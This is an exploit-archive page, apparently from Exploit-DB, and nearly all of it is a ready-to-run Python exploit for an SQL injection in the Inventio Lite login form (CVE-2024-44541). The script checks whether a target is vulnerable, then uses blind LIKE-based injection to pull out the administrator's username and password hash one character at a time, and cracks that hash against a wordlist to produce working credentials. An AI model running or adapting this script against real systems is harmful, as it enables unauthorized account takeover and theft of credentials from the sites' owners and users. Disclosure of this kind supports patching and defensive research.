
8 changes to exploits/shellcodes/ghdb Langflow 1.3.0 - Remote Code Execution (RCE) Apache Commons Text 1.10.0 - Remote Code Execution Hunk Companion Plugin 1.9.0 - Unauthenticated Plugin Installation UJCMS 9.6.3 - User Enumeration via IDOR Inventio Lite 4 - SQL Injection KiviCare Clinic & Patient Management System (EHR) 3.6.4 - Unauthenticated SQL Injection Tatsu 3.3.11 - Unauthenticated RCE
124 lines
No EOL
4.3 KiB
Python
Executable file
124 lines
No EOL
4.3 KiB
Python
Executable file
# Exploit Title: Inventio Lite 4 - SQL Injection
|
|
Error Based SQLi in "username" parameter on "/?action=processlogin."
|
|
# Date: 08/21/2024
|
|
# Exploit Author: pointedsec
|
|
# Vendor Homepage: http://evilnapsis.com
|
|
# Software Link: https://github.com/evilnapsis/inventio-lite
|
|
# Version: < 4
|
|
# Tested on: Linux, Windows
|
|
# CVE : CVE-2024-44541
|
|
# This scripts exploit this vulnerability, extracting the hashes from database and tries to decrypt it.
|
|
# The passwords are hashed like this: $pass = sha1(md5($_POST['password']));
|
|
|
|
import requests
|
|
import signal
|
|
from pwn import *
|
|
|
|
BASE_URL = "http://192.168.1.51/inventio-lite/"
|
|
PWD_DIC_PATH = "/usr/share/wordlists/rockyou.txt"
|
|
LOGIN_ACTION = BASE_URL + "?action=processlogin"
|
|
|
|
# Handling Ctrl + C
|
|
def def_handler(x,y):
|
|
log.failure("Quitting...")
|
|
exit(1)
|
|
|
|
signal.signal(signal.SIGINT, def_handler)
|
|
|
|
def is_vulnerable():
|
|
log.info("Checking if target is vulnerable")
|
|
payload = {
|
|
"username": "\") \"",
|
|
"password": "\") \""
|
|
}
|
|
r = requests.post(LOGIN_ACTION, data=payload)
|
|
if (r.status_code != 200 or "Uncaught mysqli_sql_exception" in r.text):
|
|
return True
|
|
else:
|
|
return False
|
|
|
|
def get_administrator_hash(username):
|
|
prog_hash = log.progress("Extracting Admin Password Hash")
|
|
replace_payload = "\") or username LIKE '<USER>' or email LIKE '<USER>' and password LIKE '<STR>%' and is_admin=1 LIMIT 1-- -".replace("<USER>", username)
|
|
characters = "abcdefghijklmnopqrstuvwxyz0123456789" # SHA(MD5(PASSWORD)) so there are no symbols and no uppercases
|
|
admin_hash = ""
|
|
|
|
while True:
|
|
found_char = False
|
|
for char in characters:
|
|
payload = {
|
|
"username": replace_payload.replace("<STR>", admin_hash + char),
|
|
"password": "blablablbalbablalba123@"
|
|
}
|
|
try:
|
|
r = requests.post(LOGIN_ACTION, data=payload)
|
|
r.raise_for_status()
|
|
except requests.RequestException as e:
|
|
log.error(f"Request failed: {e}")
|
|
continue
|
|
|
|
if "<script>window.location='index.php?view=home';</script>" in r.text:
|
|
admin_hash += char
|
|
prog_hash.status("-> %s" % admin_hash)
|
|
found_char = True
|
|
break
|
|
|
|
if not found_char:
|
|
break
|
|
|
|
prog_hash.status("Final Admin Hash: %s" % admin_hash)
|
|
return admin_hash
|
|
|
|
def get_administrator_username():
|
|
prog_username = log.progress("Extracting Username")
|
|
replace_payload = "\") or username like '<STR>%' or email like '<STR>%' and is_admin=1 LIMIT 1-- -"
|
|
characters = "ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789@."
|
|
username = ""
|
|
|
|
while True:
|
|
found_char = False
|
|
for char in characters:
|
|
payload = {
|
|
"username": replace_payload.replace("<STR>", username + char),
|
|
"password": "blablablablbalbla123@"
|
|
}
|
|
r = requests.post(LOGIN_ACTION, data=payload)
|
|
|
|
if "<script>window.location='index.php?view=home';</script>" in r.text:
|
|
username += char
|
|
prog_username.status("-> %s" % username)
|
|
found_char = True
|
|
break
|
|
|
|
if not found_char:
|
|
break
|
|
|
|
return username
|
|
|
|
def decrypt_password(admin_hash):
|
|
# Encryption is SHA1(MD5(PWD))
|
|
with open(PWD_DIC_PATH) as password_file:
|
|
for password in password_file:
|
|
password = password.strip()
|
|
|
|
md5_hash = hashlib.md5(password.encode()).hexdigest()
|
|
sha1_hash = hashlib.sha1(md5_hash.encode()).hexdigest()
|
|
|
|
if sha1_hash == admin_hash:
|
|
return password
|
|
|
|
log.error("Password not found in the dictionary.")
|
|
return None
|
|
|
|
if __name__ == "__main__":
|
|
# Check if target is vulnerable
|
|
if not is_vulnerable():
|
|
log.failure("Target not Vulnerable...")
|
|
exit(1)
|
|
log.success("Target Vulnerable!")
|
|
log.info("Dumping Administrator username...")
|
|
admin_username = get_administrator_username()
|
|
admin_hash = get_administrator_hash(admin_username)
|
|
pwd = decrypt_password(admin_hash)
|
|
log.success(f"Password Decrypted! -> {admin_username}:{pwd}")
|
|
log.info("Try to Log In with that username, if that doesn't work, try with some uppercase/lowercase combinations") |